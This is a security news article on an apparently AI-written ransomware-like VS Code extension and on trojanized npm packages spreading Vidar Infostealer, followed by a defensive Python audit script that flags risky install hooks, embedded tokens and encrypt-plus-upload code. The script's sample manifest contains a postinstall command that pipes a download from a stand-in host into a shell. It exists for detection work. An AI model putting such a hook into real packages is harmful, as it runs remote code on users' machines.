AI-Created Malicious VS Code Extension and Trojanized npm Packages Raise New Supply Chain Security Concerns

Cybersecurity researchers have identified a malicious Visual Studio Code (VS Code) extension with ransomware-like capabilities, allegedly created using artificial intelligence, signaling a new wave of “vibe-coded” malware. The extension, named “susvsex,” was discovered by Secure Annex researcher John Tuckner, who noted that the tool makes no attempt to disguise its harmful behavior.
Uploaded on November 5, 2025, by a user identified as “suspublisher18”, the extension’s description openly stated: “Automatically zips, uploads, and encrypts files from C:\Users\Public\testing (Windows) or /tmp/testing (macOS) on first launch.” The listing included the description “Just testing” and a non-functional email address. Microsoft has since removed the extension from the official VS Code Marketplace.
According to Tuckner, the extension was programmed to activate automatically upon installation or launch, invoking a function called “zipUploadAndEncrypt.” This function compressed files from a target directory, exfiltrated them to a remote server, and replaced them with encrypted versions. “Fortunately, the TARGET_DIRECTORY is configured to be a test staging directory so it would have little impact right now, but is easily updated with an extension release or as a command sent through the C2 channel covered next,” Tuckner explained.
In addition to encryption, the malicious extension leveraged GitHub as its command-and-control (C2) infrastructure. It used a private repository to receive commands from the attacker and sent back execution results using a GitHub token embedded within the code. The repository was linked to a user named “aykhanmv” from Baku, Azerbaijan, whose account remains active.
Tuckner further noted that the extension contained several telltale signs of AI-generated code: “Extraneous comments which detail functionality, README files with execution instructions, and placeholder variables are clear signs of ‘vibe coded’ malware.” The package also mistakenly included decryption tools, C2 server code, and GitHub access keys, potentially allowing others to hijack the control server.
The discovery coincides with a separate finding from Datadog Security Labs, which uncovered 17 malicious npm packages spreading Vidar Infostealer. The packages, uploaded between October 21 and 26, 2025, mimicked legitimate SDKs but executed malicious post-install scripts that downloaded malware from external servers.
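The two findings above share a detectable shape: a package manifest that runs code at install or editor startup, and source that pairs file encryption with an outbound channel and an embedded GitHub credential. The following audit script is an added illustration, not code from Secure Annex, Datadog or the malware itself; the manifest, source text and token are constructed, and the indicator patterns (install hooks, `*` and `onStartupFinished` activation events, the `ghp_` token prefix) are the editor's assumptions for a triage pass.

```python
import json
import re

# Indicator patterns chosen for this triage pass (editor's assumptions).
GITHUB_TOKEN_RE = re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36}\b")
REMOTE_FETCH_RE = re.compile(r"\b(curl|wget|Invoke-WebRequest)\b|https?://")
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")
STARTUP_EVENTS = ("*", "onStartupFinished")   # VS Code: activate on every launch
CRYPTO_CALLS = ("createCipheriv", "createCipher")
NETWORK_CALLS = ("https.request", "http.request", "fetch(", "axios")


def audit_manifest(manifest: dict) -> list:
    """Flag install hooks that fetch remote content (the npm case) and
    extensions that activate unconditionally at startup (the VS Code case)."""
    findings = []
    scripts = manifest.get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook, "")
        if REMOTE_FETCH_RE.search(cmd):
            findings.append(f"{hook} hook fetches remote content: {cmd!r}")
    if any(ev in STARTUP_EVENTS for ev in manifest.get("activationEvents", [])):
        findings.append("activates unconditionally at editor startup")
    return findings


def audit_source(js: str) -> list:
    """Flag an embedded GitHub token and the encrypt-plus-network pairing."""
    findings = []
    if GITHUB_TOKEN_RE.search(js):
        findings.append("hard-coded GitHub token (possible C2 credential)")
    if any(c in js for c in CRYPTO_CALLS) and any(c in js for c in NETWORK_CALLS):
        findings.append("encrypts local files and also makes outbound requests")
    return findings


def audit_package(manifest_json: str, js: str) -> list:
    return audit_manifest(json.loads(manifest_json)) + audit_source(js)


# Constructed sample resembling the described behaviour; the token is fake.
SAMPLE_MANIFEST = json.dumps({
    "name": "example-ext", "activationEvents": ["*"],
    "scripts": {"postinstall": "curl -s http://example.invalid/x.sh | sh"},
})
SAMPLE_SOURCE = (
    "const token = 'ghp_" + "A" * 36 + "';\n"
    "const c = crypto.createCipheriv('aes-256-cbc', key, iv);\n"
    "https.request({host: 'example.invalid'}).end(zipped);\n"
)

if __name__ == "__main__":
    for finding in audit_package(SAMPLE_MANIFEST, SAMPLE_SOURCE):
        print("FINDING:", finding)
```

Run it against the extracted `package.json` and concatenated JavaScript of a package before installing; four findings on the sample, none on a clean manifest.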
The incidents underscore the growing risk of AI-assisted malware development and the persistent threat of supply chain attacks across open-source ecosystems like npm, PyPI, RubyGems, and Open VSX. Researchers urge developers to remain vigilant, verify sources, and scrutinize dependencies to prevent compromise.
